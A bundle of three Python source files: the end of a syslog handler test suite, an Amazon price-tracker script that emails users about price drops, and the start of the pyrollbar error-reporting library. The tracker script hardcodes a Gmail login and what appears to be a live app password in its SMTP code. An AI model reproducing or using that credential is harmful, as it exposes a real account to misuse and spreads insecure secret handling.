mock_reconnect.side_effect = connect_side_effect
handler._send(['this is the first part', 'here is another part', 'one more part'])
finally:
mock.patch.stopall()
mock_sends['first_mock_send'].assert_has_calls([
mock.call('this is the first part'),
mock.call('here is another part'),
])
mock_sends['second_mock_send'].assert_has_calls([
mock.call('here is another part'),
mock.call('one more part'),
])
mock_reconnect.assert_called_once_with('/path/to/a/different.socket')
mock_close.assert_called_once_with()
# noinspection PyProtectedMember
def test_cleanly_slice_encoded_string(self):
# b'\xf0\x9f\xa4\xae' = barf face
# b'\xf0\x9f\x98\xbb' = cat with heart eyes
# b'\xf0\x9f\x9b\x8c' = bed
# b'\xf0\x9f\x92\xb8' = money with wings
# b'\xe2\x9c\x8d\xf0\x9f\x8f\xbb' = hand writing with pen, lightest skin
# b'\xe2\x9c\x8d\xf0\x9f\x8f\xbf' = hand writing with pen, darkest skin
assert SyslogHandler._cleanly_slice_encoded_string(
b'Hello world, this has no multi-byte characters',
15
) == (
b'Hello world, th',
b'is has no multi-byte characters',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'Hello world, this has no multi-byte characters',
16
) == (
b'Hello world, thi',
b's has no multi-byte characters',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'Hello world, this has no multi-byte characters',
17
) == (
b'Hello world, this',
b' has no multi-byte characters',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'Hello world, this has no multi-byte characters',
18
) == (
b'Hello world, this ',
b'has no multi-byte characters',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
12
) == (
b'This string ',
b'\xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
13
) == (
b'This string ',
b'\xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
14
) == (
b'This string ',
b'\xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
15
) == (
b'This string ',
b'\xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
16
) == (
b'This string \xf0\x9f\xa4\xae',
b' has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
19
) == (
b'This string \xf0\x9f\xa4\xae ha',
b's \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
21
) == (
b'This string \xf0\x9f\xa4\xae has ',
b'\xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
22
) == (
b'This string \xf0\x9f\xa4\xae has ',
b'\xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
23
) == (
b'This string \xf0\x9f\xa4\xae has ',
b'\xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
24
) == (
b'This string \xf0\x9f\xa4\xae has ',
b'\xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
25
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c',
b' multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
31
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi',
b'-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
37
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte ',
b'\xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
38
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte ',
b'\xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
39
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte ',
b'\xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
40
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d',
b'\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
41
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d',
b'\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
42
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d',
b'\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
43
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d',
b'\xf0\x9f\x8f\xbb characters!',
)
assert SyslogHandler._cleanly_slice_encoded_string(
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb characters!',
44
) == (
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d\xf0\x9f\x8f\xbb',
b' characters!',
)
# There's not really anything we can do about making this detect modifiers and not split between the base
# character and modifying character. So all we really care about is that the resulting strings successfully
# decode without errors.
b'This string \xf0\x9f\xa4\xae has \xf0\x9f\x9b\x8c multi-byte \xe2\x9c\x8d'.decode('utf-8')
b'\xf0\x9f\x8f\xbb characters!'.decode('utf-8')
|
tracker.py | from app.handlers.entry_handler import EntryHandler, AmazonCrawler
#from app.crawler.amazon_crawler import AmazonCrawler
import smtplib
import threading
import time
class Tracker():
def __init__(self):
self.entry_handler = EntryHandler()
def send_mail(self, URL, title, initial_price, new_price, user_email):
server = smtplib.SMTP('smtp.gmail.com', 587) # Establishing a connection between client and the gmail server
server.ehlo()
server.starttls() # Encrypting our connection
server.ehlo()
server.login('amazonpricet@gmail.com', 'arqdcapyimckuebi')
subject = f'"{title}" Price has fell down!'
body = f'The product "{title}" price has fallen down from $ {initial_price} to $ {new_price}!\nOpen the products link now: {URL}'
msg = f"Subject: {subject} \n\n{body}"
server.sendmail(
'amazonpricet.gmail.com',
user_email,
msg.encode('utf8')
)
server.quit()
print("Email has been sent!")
def run(self):
while True:
all_entries = self.entry_handler.get_all_entries()
for entry in all_entries:
product_url = entry.product_url
initial_price = entry.product_initial_price
crawler = AmazonCrawler(product_url)
current_price, _ = crawler.get_product_data()
if current_price < initial_price:
title = entry.product_title
user_email = entry.user_email
self.send_mail(product_url, title, initial_price, current_price, user_email)
self.entry_handler.delete_entry(entry)
time.sleep(86400) # iterating through all users once every 24 hr
class TrackerThread():
def __init__(self, interval=0):
self.interval = interval
self.tracker = Tracker()
thread = threading.Thread(target=self.tracker.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution |
__init__.py | """
Plugin for Pyramid apps to submit errors to Rollbar
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import copy
import functools
import inspect
import json
import logging
import os
import socket
import sys
import threading
import time
import traceback
import types
import uuid
import wsgiref.util
import requests
import six
from rollbar.lib import events, filters, dict_merge, parse_qs, text, transport, urljoin, iteritems, defaultJSONEncode
__version__ = '0.14.7'
__log_name__ = 'rollbar'
log = logging.getLogger(__log_name__)
try:
# 2.x
import Queue as queue
except ImportError:
# 3.x
import queue
# import request objects from various frameworks, if available
try:
from webob import BaseRequest as WebobBaseRequest
except ImportError:
WebobBaseRequest = None
try:
from django.core.exceptions import ImproperlyConfigured
except ImportError:
DjangoHttpRequest = None
RestFrameworkRequest = None
else:
try:
from django.http import HttpRequest as DjangoHttpRequest
except (ImportError, ImproperlyConfigured):
DjangoHttpRequest = None
try:
from rest_framework.request import Request as RestFrameworkRequest
except (ImportError, ImproperlyConfigured):
RestFrameworkRequest = None
del ImproperlyConfigured
try:
from werkzeug.wrappers import BaseRequest as WerkzeugRequest
except (ImportError, SyntaxError):
WerkzeugRequest = None
try:
from werkzeug.local import LocalProxy as WerkzeugLocalProxy
except (ImportError, SyntaxError):
WerkzeugLocalProxy = None
try:
from tornado.httpserver import HTTPRequest as TornadoRequest
except ImportError:
TornadoRequest = None
try:
from bottle import BaseRequest as BottleRequest
except ImportError:
BottleRequest = None
try:
from sanic.request import Request as SanicRequest
except ImportError:
SanicRequest = None
try:
from google.appengine.api.urlfetch import fetch as AppEngineFetch
except ImportError:
AppEngineFetch = None
def passthrough_decorator(func):
def wrap(*args, **kwargs):
return func(*args, **kwargs)
return wrap
try:
from tornado.httpclient import AsyncHTTPClient as TornadoAsyncHTTPClient
except ImportError:
TornadoAsyncHTTPClient = None
try:
import treq
from twisted.python import log as twisted_log
def log_handler(event):
"""
Default uncaught error handler
"""
try:
if not event.get('isError') or 'failure' not in event:
return
err = event['failure']
# Don't report Rollbar internal errors to ourselves
if issubclass(err.type, ApiException):
log.error('Rollbar internal error: %s', err.value)
else:
report_exc_info((err.type, err.value, err.getTracebackObject()))
except:
log.exception('Error while reporting to Rollbar')
# Add Rollbar as a log handler which will report uncaught errors
twisted_log.addObserver(log_handler)
except ImportError:
treq = None
try:
from falcon import Request as FalconRequest
except ImportError:
FalconRequest = None
def get_request():
"""
Get the current request object. Implementation varies on
library support. Modified below when we know which framework
is being used.
"""
# TODO(cory): add in a generic _get_locals_request() which
# will iterate up through the call stack and look for a variable
# that appears to be valid request object.
for fn in (_get_bottle_request,
_get_flask_request,
_get_pyramid_request,
_get_pylons_request):
try:
req = fn()
if req is not None:
return req
except:
pass
return None
def _get_bottle_request():
if BottleRequest is None:
return None
from bottle import request
return request
def _get_flask_request():
if WerkzeugRequest is None:
return None
from flask import request
return request
def _get_pyramid_request():
if WebobBaseRequest is None:
return None
from pyramid.threadlocal import get_current_request
return get_current_request()
def _get_pylons_request():
if WebobBaseRequest is None:
return None
from pylons import request
return request
BASE_DATA_HOOK = None
agent_log = None
VERSION = __version__
DEFAULT_ENDPOINT = 'https://api.rollbar.com/api/1/'
DEFAULT_TIMEOUT = 3
ANONYMIZE = 'anonymize'
DEFAULT_LOCALS_SIZES = {
'maxlevel': 5,
'maxdict': 10,
'maxlist': 10,
'maxtuple': 10,
'maxset': 10,
'maxfrozenset': 10,
'maxdeque': 10,
'maxarray': 10,
'maxstring': 100,
'maxlong': 40,
'maxother': 100,
}
# configuration settings
# configure by calling init() or overriding directly
SETTINGS = {
'access_token': None,
'enabled': True,
'environment': 'production',
'exception_level_filters': [],
'root': None, # root path to your code
'branch': None, # git branch name
'code_version': None,
'handler': 'thread', # 'blocking', 'thread', 'agent', 'tornado', 'gae' or 'twisted'
'endpoint': DEFAULT_ENDPOINT,
'timeout': DEFAULT_TIMEOUT,
'agent.log_file': 'log.rollbar',
'scrub_fields': [
'pw',
'passwd',
'password',
'secret',
'confirm_password',
'confirmPassword',
'password_confirmation',
'passwordConfirmation',
'access_token',
'accessToken',
'auth',
'authentication',
'authorization',
],
'url_fields': ['url', 'link', 'href'],
'notifier': {
'name': 'pyrollbar',
'version': VERSION
},
'allow_logging_basic_config': True, # set to False to avoid a call to logging.basicConfig()
'locals': {
'enabled': True,
'safe_repr': True,
'scrub_varargs': True,
'sizes': DEFAULT_LOCALS_SIZES,
'whitelisted_types': []
},
'verify_https': True,
'shortener_keys': [],
'suppress_reinit_warning': False,
'capture_email': False,
'capture_username': False,
'capture_ip': True,
'log_all_rate_limited_items': True,
'http_proxy': None,
'http_proxy_user': None,
'http_proxy_password': None,
'include_request_body': False,
}
_CURRENT_LAMBDA_CONTEXT = None
_LAST_RESPONSE_STATUS = None
# Set in init()
_transforms = []
_serialize_transform = None
_initialized = False
from rollbar.lib.transforms.scrub_redact import REDACT_REF
from rollbar.lib import transforms
from rollbar.lib.transforms.scrub import ScrubTransform
from rollbar.lib.transforms.scruburl import ScrubUrlTransform
from rollbar.lib.transforms.scrub_redact import ScrubRedactTransform
from rollbar.lib.transforms.serializable import SerializableTransform
from rollbar.lib.transforms.shortener import ShortenerTransform
## public api
def init(access_token, environment='production', scrub_fields=None, url_fields=None, **kw):
"""
Saves configuration variables in this module's SETTINGS.
access_token: project access token. Get this from the Rollbar UI:
- click "Settings" in the top nav
- click "Projects" in the left nav
- copy-paste the appropriate token.
environment: environment name. Can be any string; suggestions: 'production', 'development',
'staging', 'yourname'
**kw: provided keyword arguments will override keys in SETTINGS.
"""
global SETTINGS, agent_log, _initialized, _transforms, _serialize_transform, _threads
if scrub_fields is not None:
SETTINGS['scrub_fields'] = list(scrub_fields)
if url_fields is not None:
SETTINGS['url_fields'] = list(url_fields)
# Merge the extra config settings into SETTINGS
SETTINGS = dict_merge(SETTINGS, kw)
if _initialized:
# NOTE: Temp solution to not being able to re-init.
# New versions of pyrollbar will support re-initialization
# via the (not-yet-implemented) configure() method.
if not SETTINGS.get('suppress_reinit_warning'):
log.warning('Rollbar already initialized. Ignoring re-init.')
return
SETTINGS['access_token'] = access_token
SETTINGS['environment'] = environment
if SETTINGS.get('allow_logging_basic_config'):
logging.basicConfig()
if SETTINGS.get('handler') == 'agent':
agent_log = _create_agent_log()
# We will perform these transforms in order:
# 1. Serialize the payload to be all python built-in objects
# 2. Scrub the payloads based on the key suffixes in SETTINGS['scrub_fields']
# 3. Scrub URLs in the payload for keys that end with 'url'
# 4. Optional - If local variable gathering is enabled, transform the
# trace frame values using the ShortReprTransform.
_serialize_transform = SerializableTransform(safe_repr=SETTINGS['locals']['safe_repr'],
whitelist_types=SETTINGS['locals']['whitelisted_types'])
_transforms = [
ScrubRedactTransform(),
_serialize_transform,
ScrubTransform(suffixes=[(field,) for field in SETTINGS['scrub_fields']], redact_char='*'),
ScrubUrlTransform(suffixes=[(field,) for field in SETTINGS['url_fields']], params_to_scrub=SETTINGS['scrub_fields'])
]
# A list of key prefixes to apply our shortener transform to. The request
# being included in the body key is old behavior and is being retained for
# backwards compatibility.
shortener_keys = [
('request', 'POST'),
('request', 'json'),
('body', 'request', 'POST'),
('body', 'request', 'json'),
]
if SETTINGS['locals']['enabled']:
shortener_keys.append(('body', 'trace', 'frames', '*', 'code'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'args', '*'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'kwargs', '*'))
shortener_keys.append(('body', 'trace', 'frames', '*', 'locals', '*'))
shortener_keys.extend(SETTINGS['shortener_keys'])
shortener = ShortenerTransform(safe_repr=SETTINGS['locals']['safe_repr'],
keys=shortener_keys,
**SETTINGS['locals']['sizes'])
_transforms.append(shortener)
_threads = queue.Queue()
events.reset()
filters.add_builtin_filters(SETTINGS)
_initialized = True
def lambda_function(f):
"""
Decorator for making error handling on AWS Lambda easier
"""
@functools.wraps(f)
def wrapper(event, context):
global _CURRENT_LAMBDA_CONTEXT
_CURRENT_LAMBDA_CONTEXT = context
try:
result = f(event, context)
return wait(lambda: result)
except:
cls, exc, trace = sys.exc_info()
report_exc_info((cls, exc, trace.tb_next))
wait()
raise
return wrapper
def report_exc_info(exc_info=None, request=None, extra_data=None, payload_data=None, level=None, **kw):
"""
Reports an exception to Rollbar, using exc_info (from calling sys.exc_info())
exc_info: optional, should be the result of calling sys.exc_info(). If omitted, sys.exc_info() will be called here.
request: optional, a WebOb, Werkzeug-based or Sanic request object.
extra_data: optional, will be included in the 'custom' section of the payload
payload_data: optional, dict that will override values in the final payload
(e.g. 'level' or 'fingerprint')
kw: provided for legacy purposes; unused.
Example usage:
rollbar.init(access_token='YOUR_PROJECT_ACCESS_TOKEN')
try:
do_something()
except:
rollbar.report_exc_info(sys.exc_info(), request, {'foo': 'bar'}, {'level': 'warning'})
"""
if exc_info is None:
exc_info = sys.exc_info()
try:
return _report_exc_info(exc_info, request, extra_data, payload_data, level=level)
except Exception as e:
log.exception("Exception while reporting exc_info to Rollbar. %r", e)
def report_message(message, level='error', request=None, extra_data=None, payload_data=None):
"""
Reports an arbitrary string message to Rollbar.
message: the string body of the message
level: level to report at. One of: 'critical', 'error', 'warning', 'info', 'debug'
request: the request object for the context of the message
extra_data: dictionary of params to include with the message. 'body' is reserved.
payload_data: param names to pass in the 'data' level of the payload; overrides defaults.
"""
try:
return _report_message(message, level, request, extra_data, payload_data)
except Exception as e:
log.exception("Exception while reporting message to Rollbar. %r", e)
def send_payload(payload, access_token):
"""
Sends a payload object, (the result of calling _build_payload() + _serialize_payload()).
Uses the configured handler from SETTINGS['handler']
Available handlers:
- 'blocking': calls _send_payload() (which makes an HTTP request) immediately, blocks on it
- 'thread': starts a single-use thread that will call _send_payload(). returns immediately.
- 'agent': writes to a log file to be processed by rollbar-agent
- 'tornado': calls _send_payload_tornado() (which makes an async HTTP request using tornado's AsyncHTTPClient)
- 'gae': calls _send_payload_appengine() (which makes a blocking call to Google App Engine)
- 'twisted': calls _send_payload_twisted() (which makes an async HTTP reqeust using Twisted and Treq)
"""
payload = events.on_payload(payload)
if payload is False:
return
payload_str = _serialize_payload(payload)
handler = SETTINGS.get('handler')
if handler == 'blocking':
_send_payload(payload_str, access_token)
elif handler == 'agent':
agent_log.error(payload_str)
elif handler == 'tornado':
if TornadoAsyncHTTPClient is None:
log.error('Unable to find tornado')
return
_send_payload_tornado(payload_str, access_token)
elif handler == 'gae':
if AppEngineFetch is None:
log.error('Unable to find AppEngine URLFetch module')
return
_send_payload_appengine(payload_str, access_token)
elif handler == 'twisted':
if treq is None:
log.error('Unable to find Treq')
return
_send_payload_twisted(payload_str, access_token)
else:
# default to 'thread'
thread = threading.Thread(target=_send_payload, args=(payload_str, access_token))
_threads.put(thread)
thread.start()
def search_items(title, return_fields=None, access_token=None, endpoint=None, **search_fields):
"""
Searches a project for items that match the input criteria.
title: all or part of the item's title to search for.
return_fields: the fields that should be returned for each item.
e.g. ['id', 'project_id', 'status'] will return a dict containing
only those fields for each item.
access_token: a project access token. If this is not provided,
the one provided to init() will be used instead.
search_fields: additional fields to include in the search.
currently supported: status, level, environment
"""
if not title:
return []
if return_fields is not None:
return_fields = ','.join(return_fields)
return _get_api('search/',
title=title,
fields=return_fields,
access_token=access_token,
endpoint=endpoint,
**search_fields)
def wait(f=None):
_threads.join()
if f is not None:
return f()
class ApiException(Exception):
"""
This exception will be raised if there was a problem decoding the
response from an API call.
"""
pass
class ApiError(ApiException):
"""
This exception will be raised if the API response contains an 'err'
field, denoting there was a problem fulfilling the api request.
"""
pass
class Result(object):
"""
This class encapsulates the response from an API call.
Usage:
result = search_items(title='foo', fields=['id'])
print result.data
"""
def __init__(self, access_token, path, params, data):
self.access_token = access_token
self.path = path
self.params = params
self.data = data
def __str__(self):
return str(self.data)
class PagedResult(Result):
"""
This class wraps the response from an API call that responded with
a page of results.
Usage:
result = search_items(title='foo', fields=['id'])
print 'First page: %d, data: %s' % (result.page, result.data)
result = result.next_page()
print 'Second page: %d, data: %s' % (result.page, result.data)
"""
def __init__(self, access_token, path, page_num, params, data, endpoint=None):
super(PagedResult, self).__init__(access_token, path, params, data)
self.page = page_num
self.endpoint = endpoint
def next_page(self):
params = copy.copy(self.params)
params['page'] = self.page + 1
return _get_api(self.path, endpoint=self.endpoint, **params)
def prev_page(self):
if self.page <= 1:
return self
params = copy.copy(self.params)
params['page'] = self.page - 1
return _get_api(self.path, endpoint=self.endpoint, **params)
## internal functions
def _resolve_exception_class(idx, filter):
cls, level = filter
if isinstance(cls, six.string_types):
# Lazily resolve class name
parts = cls.split('.')
module = '.'.join(parts[:-1])
if module in sys.modules and hasattr(sys.modules[module], parts[-1]):
cls = getattr(sys.modules[module], parts[-1])
SETTINGS['exception_level_filters'][idx] = (cls, level)
else:
cls = None
return cls, level
def _filtered_level(exception):
for i, filter in enumerate(SETTINGS['exception_level_filters']):
cls, level = _resolve_exception_class(i, filter)
if cls and isinstance(exception, cls):
return level
return None
def _is_ignored(exception):
return _filtered_level(exception) == 'ignored'
def _create_agent_log():
"""
Creates .rollbar log file for use with rollbar-agent
"""
log_file = SETTINGS['agent.log_file']
if not log_file.endswith('.rollbar'):
log.error("Provided agent log file does not end with .rollbar, which it must. "
"Using default instead.")
log_file = DEFAULTS['agent.log_file']
retval = logging.getLogger('rollbar_agent')
handler = logging.FileHandler(log_file, 'a', 'utf-8')
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
retval.addHandler(handler)
retval.setLevel(logging.WARNING)
return retval
def _report_exc_info(exc_info, request, extra_data, payload_data, level=None):
"""
Called by report_exc_info() wrapper
"""
if not _check_config():
return
filtered_level = _filtered_level(exc_info[1])
if level is None:
level = filtered_level
filtered_exc_info = events.on_exception_info(exc_info,
request=request,
extra_data=extra_data,
payload_data=payload_data,
level=level)
if filtered_exc_info is False:
return
cls, exc, trace = filtered_exc_info
data = _build_base_data(request)
if level is not None:
data['level'] = level
# walk the trace chain to collect cause and context exceptions
trace_chain = _walk_trace_chain(cls, exc, trace)
extra_trace_data = None
if len(trace_chain) > 1:
data['body'] = {
'trace_chain': trace_chain
}
if payload_data and ('body' in payload_data) and ('trace' in payload_data['body']):
extra_trace_data = payload_data['body']['trace']
del payload_data['body']['trace']
else:
data['body'] = {
'trace': trace_chain[0]
}
if extra_data:
extra_data = extra_data
if not isinstance(extra_data, dict):
extra_data = {'value': extra_data}
if extra_trace_data:
extra_data = dict_merge(extra_data, extra_trace_data)
data['custom'] = extra_data
if extra_trace_data and not extra_data:
data['custom'] = extra_trace_data
request = _get_actual_request(request)
_add_request_data(data, request)
_add_person_data(data, request)
_add_lambda_context_data(data)
data['server'] = _build_server_data()
if payload_data:
data = dict_merge(data, payload_data)
payload = _build_payload(data)
send_payload(payload, payload.get('access_token'))
return data['uuid']
def _walk_trace_chain(cls, exc, trace):
trace_chain = [_trace_data(cls, exc, trace)]
while True:
exc = getattr(exc, '__cause__', None) or getattr(exc, '__context__', None)
if not exc:
break
trace_chain.append(_trace_data(type(exc), exc, getattr(exc, '__traceback__', None)))
return trace_chain
def _trace_data(cls, exc, trace):
# exception info
# most recent call last
raw_frames = traceback.extract_tb(trace)
frames = [{'filename': f[0], 'lineno': f[1], 'method': f[2], 'code': f[3]} for f in raw_frames]
trace_data = {
'frames': frames,
'exception': {
'class': getattr(cls, '__name__', cls.__class__.__name__),
'message': text(exc),
}
}
_add_locals_data(trace_data, (cls, exc, trace))
return trace_data
def _report_message(message, level, request, extra_data, payload_data):
"""
Called by report_message() wrapper
"""
if not _check_config():
return
filtered_message = events.on_message(message,
request=request,
extra_data=extra_data,
payload_data=payload_data,
level=level)
if filtered_message is False:
return
data = _build_base_data(request, level=level)
# message
data['body'] = {
'message': {
'body': filtered_message
}
}
if extra_data:
extra_data = extra_data
data['body']['message'].update(extra_data)
request = _get_actual_request(request)
_add_request_data(data, request)
_add_person_data(data, request)
_add_lambda_context_data(data)
data['server'] = _build_server_data()
if payload_data:
data = dict_merge(data, payload_data)
payload = _build_payload(data)
send_payload(payload, payload.get('access_token'))
return data['uuid']
def _check_config():
if not SETTINGS.get('enabled'):
log.info("pyrollbar: Not reporting because rollbar is disabled.")
return False
# skip access token check for the agent handler
if SETTINGS.get('handler') == 'agent':
return True
# make sure we have an access_token
if not SETTINGS.get('access_token'):
log.warning("pyrollbar: No access_token provided. Please configure by calling rollbar.init() with your access token.")
return False
return True
def _build_base_data(request, level='error'):
data = {
'timestamp': int(time.time()),
'environment': SETTINGS['environment'],
'level': level,
'language': 'python %s' % '.'.join(str(x) for x in sys.version_info[:3]),
'notifier': SETTINGS['notifier'],
'uuid': text(uuid.uuid4()),
}
if SETTINGS.get('code_version'):
data['code_version'] = SETTINGS['code_version']
if BASE_DATA_HOOK:
BASE_DATA_HOOK(request, data)
return data
def _add_person_data(data, request):
try:
person_data = _build_person_data(request)
except Exception as e:
log.exception("Exception while building person data for Rollbar payload: %r", e)
else:
if person_data:
if not SETTINGS['capture_username'] and 'username' in person_data:
person_data['username'] = None
if not SETTINGS['capture_email'] and 'email' in person_data:
person_data['email'] = None
data['person'] = person_data
def _build_person_data(request):
"""
Returns a dictionary describing the logged-in user using data from `request.
Try request.rollbar_person first, then 'user', then 'user_id'
"""
if hasattr(request, 'rollbar_person'):
rollbar_person_prop = request.rollbar_person
try:
person = rollbar_person_prop()
except TypeError:
person = rollbar_person_prop
if person and isinstance(person, dict):
return person
else:
return None
if hasattr(request, 'user'):
user_prop = request.user
try:
user = user_prop()
except TypeError:
user = user_prop
if not user:
return None
elif isinstance(user, dict):
return user
else:
retval = {}
if getattr(user, 'id', None):
retval['id'] = text(user.id)
elif getattr(user, 'user_id', None):
retval['id'] = text(user.user_id)
# id is required, so only include username/email if we have an id
if retval.get('id'):
username = getattr(user, 'username', None)
email = getattr(user, 'email', None)
retval.update({
'username': username,
'email': email
})
return retval
if hasattr(request, 'user_id'):
user_id_prop = request.user_id
try:
user_id = user_id_prop()
except TypeError:
user_id = user_id_prop
if not user_id:
return None
return {'id': text(user_id)}
def _get_func_from_frame(frame):
func_name = inspect.getframeinfo(frame).function
caller = frame.f_back
if caller:
func = caller.f_locals.get(func_name,
caller.f_globals.get(func_name))
else:
func = None
return func
def _flatten_nested_lists(l):
ret = []
for x in l:
if isinstance(x, list):
ret.extend(_flatten_nested_lists(x))
else:
ret.append(x)
return ret
def _add_locals_data(trace_data, exc_info):
if not SETTINGS['locals']['enabled']:
return
frames = trace_data['frames']
cur_tb = exc_info[2]
frame_num = 0
num_frames = len(frames)
while cur_tb:
cur_frame = frames[frame_num]
tb_frame = cur_tb.tb_frame
cur_tb = cur_tb.tb_next
if not isinstance(tb_frame, types.FrameType):
# this can happen if the traceback or frame is wrapped in some way,
# for example by `ExceptionInfo` in
# https://github.com/celery/billiard/blob/master/billiard/einfo.py
log.warning('Traceback frame not a types.FrameType. Ignoring.')
frame_num += 1
continue
# Create placeholders for argspec/varargspec/keywordspec/locals
argspec = None
varargspec = None
keywordspec = None
_locals = {}
try:
arginfo = inspect.getargvalues(tb_frame)
# Optionally fill in locals for this frame
if arginfo.locals and _check_add_locals(cur_frame, frame_num, num_frames):
# Get all of the named args
#
# args can be a nested list of args in the case where there
# are anonymous tuple args provided.
# e.g. in Python 2 you can:
# def func((x, (a, b), z)):
# return x + a + b + z
#
